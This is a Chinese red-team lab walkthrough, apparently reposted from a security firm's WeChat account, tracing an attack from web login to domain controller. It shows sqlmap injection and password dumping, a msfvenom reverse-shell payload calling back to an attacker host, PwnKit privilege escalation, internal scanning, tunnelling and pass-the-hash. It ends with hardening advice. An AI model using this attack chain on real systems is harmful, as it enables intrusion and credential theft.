注:此文为靶场练习记录,非实际情境。
一
信息收集
nmap -p- --min-rate 1000 39.104.*.* -Pn*左右滑动查看更多
二
漏洞利用
发现有登录功能 尝试sql注入:
python sqlmap.py -r 1.txt --batch --random-agent --dbs*左右滑动查看更多
跑出:
python sqlmap.py -r 1.txt --batch --random-agent -D `0x7e_lab` --tablespython sqlmap.py -r 1.txt --batch --random-agent -D `0x7e_lab` -T users --columns
*左右滑动查看更多
python sqlmap.py -r 1.txt --batch --random-agent -D `0x7e_lab` -T users -C password --dump
*左右滑动查看更多
|
|
尝试解密密码hash。
密码有加盐,这里需要在字典的每一行前加一个NaCl。
|
user |
password |
解密 |
|
administrator |
15657792073e8a843d4f91fc403454e1 |
|
|
bill |
13edad4932da9dbb57d9cd15b66ed104 |
NaCliluvhorsesandgym |
|
michael |
bd3dad50e2d578ecba87d5fa15ca5f85 |
NaC12applesplus2apples |
|
john |
a7eed23a7be6fe0d765197b1027453fe |
有了上面爆库出来的表md5解密。得到:
|
bill |
13edad4932da9dbb57d9cd15b66ed104 |
NaCliluvhorsesandgym |
|
michael |
bd3dad50e2d578ecba87d5fa15ca5f85 |
NaC12applesplus2apples |
Bill的密码去盐后为luvhorsesandgym。
ssh登录bill/iluvhorsesandgym:
msf生成一个反弹elf让目标机器上线:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=8.130.*.* LPORT=1234 -f elf -o zbdx.elf*左右滑动查看更多
上传到http://39.104..:10086/。
修改权限777。
msf设置监听上线:
攻击机:msfconsole -quseexploit/multi/handlersetpayload linux/x86/setlhost8.130.*.*setlport1234run------肉鸡:./zbdx.elf
获取meterpreter之后再进行root提权。
获取meterpreter之后:
run post/multi/recon/local_exploit_suggester*左右滑动查看更多
use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexecshow options 进行配置run
*左右滑动查看更多
上传fscan进行主机存活探测。
192.168.0.100+
chomod777fscan_amd64# 修改权限./fscan_amd64 -h192.168.0/24# 存活主机探测
*左右滑动查看更多
可以看到内网主机有:
(icmp)Target192.168.0.2isalive(icmp)Target192.168.0.128isalive(icmp)Target192.168.0.129isalive(icmp)Target192.168.0.143isalive
*左右滑动查看更多
143是使用的这台跳板机:
128是win7,129是0x7e的域控。
在之前的主机文件夹中发现台账,其中记录有部分设备的登录密码,发现用户名win7。
|
|
使用ssh进行端口转发:
ssh-CfNg-L2333:192.168.0.128:3389bill@39.104.*.* -p10086rdesktop127.0.0.1:2333
*左右滑动查看更多
尝试用用户名密码登入3389。
win7/QWEa*****或使用Kali添加socks:
sudo vi /etc/proxychains4.conf
最后一行添加:
socks5 8.130.*.* 2222
然后就能直接和win7通信:
proxychains rdesktop 192.168.0.128
后续操作就和上面一样了。使用账号密码登录进入win7,前期使用msf生成elf反弹控制到linux主机,然后从msf转入CS对其他windows系统进行下一步横向。
win7上线cs。
抓取明文密码:
|
|
然后提权:
|
|
主机发现:
net view/port scan
开启中继监听:
|
|
利用system权限的win7横向移动到win servers2012上:
|
|
成功拿到win servers2012,然后抓取明文密码与hash。
先用VNC交互看看,然后使用插件开启3389:
|
|
尝试链接rdp(失败):
看看文件:
|
|
三 域
shell systeminfo # 查看域信息
主机存活探测。
net view失败了,那就试试portscan。
显示10段的有:
10.10.10.12810.10.10.134# 是winservers201210.10.10.254
|
|
尝试哈希传递到128(前期抓取过明文密码以及hash):
|
|
成功。
四
加固建议
1. 对网站及时进行漏洞排查以及修复。
2. 避免密码复用,同时严格执行密码复杂度策略,避免弱口令,防止攻击者轻易对密码解密。
3. 对SSH、RDP等进行严格的限制。
4. 避免在服务器中存放台账等信息。
5. 部署防火墙,严格配置防火墙策略,关注规则库版本。
6. 服务器需及时进行漏洞排查以及修复,从而防止攻击者可以利用漏洞进行提权。
7. 严格划分不同用户权限。
原文始发于微信公众号(安恒信息安全服务):九维团队-红队(突破)| 复盘试验一次从web到域控的过程
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论